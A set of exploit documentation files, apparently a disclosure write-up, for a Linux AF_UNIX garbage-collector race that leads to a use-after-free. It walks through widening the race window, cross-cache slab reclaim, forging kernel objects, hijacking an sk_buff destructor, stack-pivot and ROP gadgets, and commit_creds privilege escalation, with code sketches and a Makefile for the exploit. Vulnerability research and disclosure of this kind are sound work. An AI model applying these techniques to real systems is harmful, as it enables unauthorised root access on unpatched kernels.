# docs/exploit.md

## Triggering the race condition

This vulnerability gives us two race windows to work with.
The first one is in unix_stream_connect():

```
static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
			       int addr_len, int flags)
{
	...
	unix_peer(sk) = newsk;
	[window 1 start]
	unix_state_unlock(sk);

	/* take ten and send info to listening sock */
	spin_lock(&other->sk_receive_queue.lock);
	[window 1 end]
	__skb_queue_tail(&other->sk_receive_queue, skb);
	spin_unlock(&other->sk_receive_queue.lock);
	...
```

This function is triggered by calling connect() on CPU 0. That CPU does nothing else until the race-condition part of the exploit is over.

We have to use the other available CPU to perform 3 operations during this window:
1. Send the victim socket through the connecting socket (sketched below).
2. Close the victim socket.
3. Trigger garbage collection and run unix_gc() until the start of window 2.

If we start too early, the send fails because the socket is not connected yet and the exploit attempt is lost.
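
A minimal sketch of step 1, passing the victim fd over the half-connected client socket with SCM_RIGHTS (the helper name and error handling here are ours, not the exploit's):

```
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

/* Queue victim_fd as an in-flight fd on via_sock. This only succeeds
 * once unix_peer(sk) has been set inside window 1; calling it too
 * early fails with ENOTCONN and the attempt is lost. */
static ssize_t send_fd(int via_sock, int victim_fd)
{
    char data = 'x';
    struct iovec iov = { .iov_base = &data, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } u = { 0 };
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = u.buf, .msg_controllen = sizeof(u.buf),
    };
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);

    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &victim_fd, sizeof(int));

    return sendmsg(via_sock, &msg, 0);
}
```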

The second window is in the unix_gc() function:
```
void unix_gc(void)
{
	...
	list_for_each_entry(u, &gc_candidates, link)
		scan_children(&u->sk, dec_inflight, NULL);
	[window 2 start]
	/* Restore the references for children of all candidates,
	 * which have remaining references. Do this recursively, so
	 * only those remain, which form cyclic references.
	 *
	 * Use a "cursor" link, to make the list traversal safe, even
	 * though elements might be moved about.
	 */
	list_add(&cursor, &gc_candidates);
	[window 2 end]
	while (cursor.next != &gc_candidates) {
		u = list_entry(cursor.next, struct unix_sock, link);

		/* Move cursor to after the current position. */
		list_move(&cursor, &u->link);

		if (atomic_long_read(&u->inflight) > 0) {
			list_move_tail(&u->link, &not_cycle_list);
			__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
			scan_children(&u->sk, inc_inflight_move_tail, NULL);
		}
	}
	list_del(&cursor);
```

For the vulnerability to trigger, two conditions have to be met:
1. The first scan_children() must not see the embryo in the receive queue of the server socket.
2. The second scan_children() has to see the embryo.

This causes a decrement/increment mismatch and the resulting use-after-free.

In other words, window 2 has to run entirely inside window 1 of unix_stream_connect().


To have a chance of aligning the two threads correctly we have to extend both race windows as much as possible.
To do that we use the well-known timerfd technique invented by Jann Horn.
The basic idea is to set an hrtimer-based timerfd to fire a timer interrupt during our race window and to attach as many epoll watches to this timerfd as RLIMIT_NOFILE allows, which makes handling the interrupt take longer.
For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).
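
To make this concrete, here is a minimal sketch of the setup, with illustrative constants and helper names of our own (the real exploit calibrates the delays empirically):

```
#include <sys/epoll.h>
#include <sys/timerfd.h>
#include <time.h>

#define N_EPOLL_WATCHES 1024 /* bounded by RLIMIT_NOFILE */

static int epfds[N_EPOLL_WATCHES];

/* Attach many epoll instances to one timerfd: each watch adds work to
 * the hrtimer expiry path, stretching the interrupt that we aim to
 * land inside the race window. */
static int setup_slow_timerfd(void)
{
    int tfd = timerfd_create(CLOCK_MONOTONIC, 0);

    for (int i = 0; i < N_EPOLL_WATCHES; i++) {
        struct epoll_event ev = { .events = EPOLLIN };

        epfds[i] = epoll_create1(0);
        epoll_ctl(epfds[i], EPOLL_CTL_ADD, tfd, &ev);
    }
    return tfd;
}

/* Arm a one-shot expiry meant to fire inside the race window. */
static void arm_timer(int tfd, long delay_ns)
{
    struct itimerspec its = {
        .it_value = { .tv_sec = 0, .tv_nsec = delay_ns },
    };

    timerfd_settime(tfd, 0, &its, NULL);
}
```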

Here's the triggering sequence (we use 2 CPUs; CPU 1 executes the child_send() thread):

| CPU 0 | CPU 1 |
| -------- | -------- |
| arms timer 1 to trigger after a delay | - |
| calls connect() on the client socket | - |
| unix_stream_connect() runs until the start of window 1 | - |
| timer 1 is triggered during window 1 | - |
| timer goes through all epoll notifications | sends victim socket through the client socket |
| ... | closes victim socket |
| ... | arms timer 2 to trigger after a delay |
| ... | closes another socket to trigger unix_gc() |
| ... | unix_gc() runs until the start of window 2 |
| ... | timer 2 is triggered during window 2 |
| timer 1 handler ends | timer goes through all epoll notifications |
| window 1 ends, embryo is added to the receive queue | ... |
| - | timer 2 handler ends, window 2 ends |
| - | second scan_children() executes inc_inflight_move_tail() on the victim socket |

## Exploiting the use-after-free

At this point our victim socket is inflight, linked into the gc_inflight_list, and has an inflight reference count of 2.
The next step is to receive this socket and close it. This frees its struct sock object, but the object stays referenced on the gc_inflight_list.
For unix sockets, struct sock is allocated from a dedicated kmem_cache called 'UNIX'. On our target, one slab takes an order-2 page (size 0x4000) and fits 15 objects.

To exploit the use-after-free we have to get the slab containing our victim object discarded and returned to the page allocator.
This is done using standard cross-cache techniques:
1. Free all objects of the given slab.
2. Create a lot of partial slabs to unfreeze the empty slab and get it discarded.

However, in this case we need maximum reliability - winning the race is such a rare event that we can't afford to make mistakes in the later stages of the exploit.

Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt.
This is done in the get_fresh_unix() function.
One problem we have to solve is that when a unix socket is created, an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, interfering with the detection of a new UNIX slab.

To solve this we first allocate some netlink sockets, which do not have their own dedicated sock object cache, so the only order-2 page allocations they cause come from sock_inode_cache.
This lets us get a fresh sock_inode_cache slab first and then proceed with unix socket allocations to get a fresh UNIX slab, as sketched below.
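
A hedged sketch of that ordering (the socket counts are illustrative, not the exploit's tuned values):

```
#include <linux/netlink.h>
#include <sys/socket.h>

#define N_NETLINK 64
#define N_UNIX    16

/* Netlink sockets have no dedicated sock cache, so the only order-2
 * page allocations they trigger come from sock_inode_cache. */
static void prime_caches(int nl_fds[N_NETLINK], int unix_fds[N_UNIX])
{
    /* Step 1: force a fresh sock_inode_cache slab. */
    for (int i = 0; i < N_NETLINK; i++)
        nl_fds[i] = socket(AF_NETLINK, SOCK_RAW, NETLINK_USERSOCK);

    /* Step 2: unix socket allocations now land in a fresh 'UNIX'
     * slab whose backing page we can track. */
    for (int i = 0; i < N_UNIX; i++)
        unix_fds[i] = socket(AF_UNIX, SOCK_STREAM, 0);
}
```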

After the slab page is returned to the page allocator we can easily reclaim it using an xattr of size 0x4000 - xattr values larger than 0x2000 bytes are allocated directly from the page allocator.
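
For instance, something along these lines (the tmpfs path and xattr name are placeholders):

```
#include <sys/xattr.h>

#define RECLAIM_SIZE 0x4000

/* A 0x4000-byte xattr value bypasses the kmalloc caches (sizes above
 * 0x2000 come straight from the page allocator), so it can land on
 * the just-freed order-2 UNIX slab page. */
static int reclaim_slab_page(const char *tmpfs_path, const void *payload)
{
    return setxattr(tmpfs_path, "user.reclaim", payload, RECLAIM_SIZE, 0);
}
```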

## Getting RIP control

At this point we have a struct sock object linked into the gc_inflight_list whose memory we can fill with arbitrary data.
This list is traversed by unix_gc(): if we craft a fake sock object that is convincing enough, unix_gc() will walk the gc_inflight_list and move sk_buff objects from our fake sock's receive queue to the 'hitlist' that is then passed to skb_queue_purge().

unix_gc() uses the generic list handling functions to move the victim object between lists multiple times, and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers.
Fields such as sk_socket->file are also accessed, so we have to craft the related objects (or at least parts of them) as well: struct socket, struct file, struct inode, and finally the sk_buff - this last object contains the function pointer giving us RIP control, plus the ROP chain.

But first, we need a place with a known address to store all these objects.

### Crafting objects in kernel memory

The fake kernel objects were sprayed into physical memory by creating a lot of large tmpfs xattrs and are referenced via direct-mapping addresses - more details can be found in the [novel techniques](novel-techniques.md) section.

The first fake socket, which replaces the victim object on the gc_inflight_list, is prepared in prepare_sock() and holds pointers to the ones prepared in prepare_more_socks(). These are allocated at the very beginning of the exploit - we can do that because their location in memory is known in advance.

### Triggering the sk_buff destructor to get RIP control

When an inflight socket is chosen to be released by unix_gc(), the sk_buff carrying it is removed from the sk_receive_queue, linked into the 'hitlist', and then skb_queue_purge() is called on that list:
```
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
	struct sk_buff *skb;

	while ((skb = __skb_dequeue(list)) != NULL)
		kfree_skb(skb);
}
```

If this is the last reference to a given skb, skb_release_head_state() is eventually called:
```
void skb_release_head_state(struct sk_buff *skb)
{
	skb_dst_drop(skb);
	if (skb->destructor) {
		DEBUG_NET_WARN_ON_ONCE(in_hardirq());
		skb->destructor(skb);
	}
#if IS_ENABLED(CONFIG_NF_CONNTRACK)
	nf_conntrack_put(skb_nfct(skb));
#endif
	skb_ext_put(skb);
}
```

Because we control the entire contents of the sk_buff object, we can make sure the destructor gets called.

## Pivot to ROP

When the destructor is called, RDI contains a pointer to our fake sk_buff object.
The first 16 bytes of this object are used by the list head, so we can't start our ROP chain there.

The following chain of gadgets lets us pivot to rdi+0x10, where our ROP chain starts:

```
mov r8,QWORD PTR [rdi+0xc8]
mov eax,0x1
test r8,r8
je 0xffffffff8218aac1
mov rsi,rdi
mov rcx,r14
mov rdi,rbp
mov rdx,r15
call 0xffffffff8242ca60 <__x86_indirect_thunk_r8>
```

This copies RDI to RSI and transfers control (via R8, loaded from [rdi+0xc8]) to the next gadget:

```
push rsi
jmp qword [rsi-0x70]
```

This pushes RSI (the address of our fake sk_buff) onto the stack and jumps to the gadget stored at [rsi-0x70]. The -0x70 offset is safe to read because our sk_buff is part of a larger allocation that we also control.

Finally:

```
pop rsp
pop rbp
pop rbx
ret
```

The pop rsp loads the just-pushed sk_buff address into RSP; the two pops that follow move RSP past the list_head at the start of the sk_buff, so the final ret starts executing our chain at offset 0x10.

## Second pivot

There is not much space at the beginning of the sk_buff - the next field used by the kernel is at offset 0x38, so we have room for only 3 gadgets. That is enough to pivot to a larger area with a simple pop rsp ; ret.
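
Putting the gadgets together, the fake sk_buff layout they imply looks roughly like this (a sketch based on the offsets quoted above; all gadget addresses are placeholders resolved at runtime):

```
/* Placeholder gadget addresses (resolved from the leaked kernel base). */
#define PUSH_RSI_JMP_GADGET 0x0UL /* push rsi ; jmp qword [rsi-0x70] */
#define POP3_RET_GADGET     0x0UL /* pop rsp ; pop rbp ; pop rbx ; ret */
#define POP_RSP_RET_GADGET  0x0UL /* pop rsp ; ret */

static void build_pivot(unsigned long *skb, unsigned long stage2_stack)
{
    /* skb[0]/skb[1] (+0x00/+0x08): valid list_head links, needed to
     * survive the CONFIG_DEBUG_LIST checks in unix_gc(). */

    /* skb->destructor (offset not shown here) points at the
     * 'mov r8, [rdi+0xc8] ... call r8' gadget; its call target: */
    *(unsigned long *)((char *)skb + 0xc8) = PUSH_RSI_JMP_GADGET;

    /* Target of 'jmp qword [rsi-0x70]' - sits just before the fake
     * sk_buff, inside the same large controlled allocation. */
    *(unsigned long *)((char *)skb - 0x70) = POP3_RET_GADGET;

    /* After 'pop rsp ; pop rbp ; pop rbx', RSP = skb+0x10 and the
     * ret fetches its target from there. Only +0x10..+0x38 is free
     * before real sk_buff fields begin. */
    skb[2] = POP_RSP_RET_GADGET;  /* +0x10: pivot once more...      */
    skb[3] = stage2_stack;        /* +0x18: ...to the stage-2 chain */
}
```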

## Privilege escalation

The second stage of the ROP chain does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to userspace.
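
A hedged sketch of how such a stage-2 chain can be laid out (every address below is a placeholder resolved from the leaked kernel base; the exploit's exact chain may differ):

```
#define POP_RDI_RET    0x0UL /* pop rdi ; ret */
#define POP_RSI_RET    0x0UL /* pop rsi ; ret */
#define INIT_CRED      0x0UL /* &init_cred */
#define COMMIT_CREDS   0x0UL /* commit_creds() */
#define OUR_TASK       0x0UL /* task_struct of our process */
#define INIT_NSPROXY   0x0UL /* &init_nsproxy */
#define SWITCH_TASK_NS 0x0UL /* switch_task_namespaces() */
#define RET_TO_USER    0x0UL /* swapgs/iretq return trampoline */

static void build_stage2(unsigned long *rop)
{
    int i = 0;

    rop[i++] = POP_RDI_RET;
    rop[i++] = INIT_CRED;
    rop[i++] = COMMIT_CREDS;   /* commit_creds(&init_cred) */

    rop[i++] = POP_RDI_RET;
    rop[i++] = OUR_TASK;
    rop[i++] = POP_RSI_RET;
    rop[i++] = INIT_NSPROXY;
    rop[i++] = SWITCH_TASK_NS; /* switch_task_namespaces(task, &init_nsproxy) */

    rop[i++] = RET_TO_USER;    /* back to a userspace continuation */
}
```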

# docs/novel-techniques.md

### Storing objects under a known address in kernel memory

There's a surprisingly simple way to store an almost unlimited amount of data at a known kernel address, which makes tricks like using cpu_entry_area obsolete.

All data stored in memory is accessible in kernel mode via the direct physical memory mapping.
The virtual address of an object is the start of the direct mapping (page_offset_base) plus an offset derived from the PFN of the physical page.
Physical addresses of heap slabs or user memory are easily predicted - only the kernel code/data sections are randomized.
Even if everything were randomized, we could simply spray most of the physical memory with our payload, defeating any such mitigation.

page_offset_base is randomized, but on systems with PTI disabled we can use a side-channel technique like prefetch to leak this address, the same way we leak the start of the kernel code section.

There are many ways to store data in memory - I prefer using large xattrs on tmpfs.
The maximum size of one xattr value is 0xffff bytes, and allocations over 0x2000 bytes are served directly from the page allocator.
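
A sketch of the resulting address computation (page_offset_base comes from the prefetch leak; the PFN is predicted or covered by the spray):

```
/* Direct-mapping address of a physical page: the leaked
 * page_offset_base plus the page frame number times the page size. */
static unsigned long direct_map_addr(unsigned long page_offset_base,
                                     unsigned long pfn)
{
    return page_offset_base + (pfn << 12);
}
```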

# docs/vulnerability.md

## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_UNIX
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1fd05ba5a2f2aa8e7b9b52ef55df850e2e7d54c9

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=47d8ac011fe1c9251070e1bd64cb10b48193ec51

## Affected kernel versions

Introduced in 3.0. Fixed in 6.1.87, 6.6.28 and other stable trees.

## Affected component, subsystem

net/unix

## Description

The garbage collector does not take into account the risk of an embryo
getting enqueued during garbage collection. If such an embryo has a peer
that carries SCM_RIGHTS, two consecutive passes of scan_children() may
see a different set of children, leading to an incorrectly elevated
inflight count and then a dangling pointer within the gc_inflight_list.

All sockets are AF_UNIX/SOCK_STREAM:
- S is an unconnected socket
- L is a listening in-flight socket bound to addr, not in fdtable
- V's fd will be passed via sendmsg(), gets inflight count bumped

```
connect(S, addr)          sendmsg(S, [V]); close(V)     __unix_gc()
----------------          -------------------------     -----------

NS = unix_create1()
skb1 = sock_wmalloc(NS)
L = unix_find_other(addr)
unix_state_lock(L)
unix_peer(S) = NS
                          // V count=1 inflight=0

                          NS = unix_peer(S)
                          skb2 = sock_alloc()
                          skb_queue_tail(NS, skb2[V])

                          // V became in-flight
                          // V count=2 inflight=1

                          close(V)

                          // V count=1 inflight=1
                          // GC candidate condition met

                                                        for u in gc_inflight_list:
                                                          if (total_refs == inflight_refs)
                                                            add u to gc_candidates

                                                        // gc_candidates={L, V}

                                                        for u in gc_candidates:
                                                          scan_children(u, dec_inflight)

                                                        // embryo (skb1) was not
                                                        // reachable from L yet, so V's
                                                        // inflight remains unchanged

__skb_queue_tail(L, skb1)
unix_state_unlock(L)
                                                        for u in gc_candidates:
                                                          if (u.inflight)
                                                            scan_children(u, inc_inflight_move_tail)

                                                        // V count=1 inflight=2 (!)
```

# Makefile

```
INCLUDES =
LIBS = -pthread -ldl
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17800.147.54.h
	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
	sudo apt-get install libkeyutils-dev
```